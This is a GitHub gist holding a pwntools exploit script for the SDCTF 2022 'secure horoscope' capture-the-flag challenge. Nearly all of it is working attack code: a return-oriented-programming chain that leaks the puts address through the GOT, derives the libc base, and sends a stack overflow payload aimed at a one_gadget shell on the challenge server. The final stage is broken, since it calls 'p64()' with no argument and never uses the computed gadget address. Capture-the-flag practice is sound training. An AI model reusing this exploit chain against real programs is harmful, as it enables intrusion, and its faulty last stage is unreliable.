Last active
May 9, 2022 00:18
-
-
Save reductor/97533396b4a8ea2f41686fc82f3aeec8 to your computer and use it in GitHub Desktop.
sdctf 2022 - secure horoscope
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # This exploit template was generated via: | |
| # $ pwn template ./secureHoroscope --host sechoroscope.sdc.tf --port 1337 | |
| from pwn import * | |
| # Set up pwntools for the correct architecture | |
| #exe = context.binary = ELF('./secureHoroscope') | |
| exe = context.binary = ELF('./secureHoroscope_patched') | |
| # Many built-in settings can be controlled on the command-line and show up | |
| # in "args". For example, to dump all data sent/received, and disable ASLR | |
| # for all created processes... | |
| # ./exploit.py DEBUG NOASLR | |
| # ./exploit.py GDB HOST=example.com PORT=4141 | |
| host = args.HOST or 'sechoroscope.sdc.tf' | |
| port = int(args.PORT or 1337) | |
| def start_local(argv=[], *a, **kw): | |
| '''Execute the target binary locally''' | |
| if args.GDB: | |
| return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) | |
| else: | |
| return process([exe.path] + argv, *a, **kw) | |
| def start_remote(argv=[], *a, **kw): | |
| '''Connect to the process on the remote host''' | |
| io = connect(host, port) | |
| if args.GDB: | |
| gdb.attach(io, gdbscript=gdbscript) | |
| return io | |
| def start(argv=[], *a, **kw): | |
| '''Start the exploit against the target.''' | |
| if args.LOCAL: | |
| return start_local(argv, *a, **kw) | |
| else: | |
| return start_remote(argv, *a, **kw) | |
| # Specify your GDB script here for debugging | |
| # GDB will be launched if the exploit is run via e.g. | |
| # ./exploit.py GDB | |
| gdbscript = ''' | |
| tbreak main | |
| continue | |
| '''.format(**locals()) | |
| #=========================================================== | |
| # EXPLOIT GOES HERE | |
| #=========================================================== | |
| # Arch: amd64-64-little | |
| # RELRO: Partial RELRO | |
| # Stack: No canary found | |
| # NX: NX enabled | |
| # PIE: No PIE (0x400000) | |
| libc = ELF('libc-2.27.so') | |
| io = start() | |
| input('waiting') | |
| pop_rdi = 0x0000000000400873 | |
| payload = fit( | |
| { | |
| 0: p64(pop_rdi) + p64(exe.symbols.got['puts']) + p64(exe.symbols['puts']) + p64(0x0400751) | |
| }, length=40) | |
| io.sendafter('feel\n', payload) | |
| payload = fit( | |
| { | |
| 'daab': p64(exe.symbols.got['puts']), # rbp | |
| 'faab': p64(0x400871) + p64(0x1122334455667788) | |
| } | |
| ,length=140 | |
| ) | |
| io.sendafter(b'horoscope\n', payload) | |
| print(0,io.recvline()) | |
| print(1,io.recvline()) | |
| print(2,io.recvline()) | |
| puts = unpack(io.recvline()[:-1][:8],'all') | |
| print('puts=',hex(puts)) | |
| libc.address = puts - libc.symbols['puts'] | |
| print('libc=',hex(libc.address)) | |
| sleep(0.5) | |
| one_gadget = libc.address+0x4f2a5 | |
| payload = p64() | |
| io.send(fit({'faab':payload}, length=140)) | |
| io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment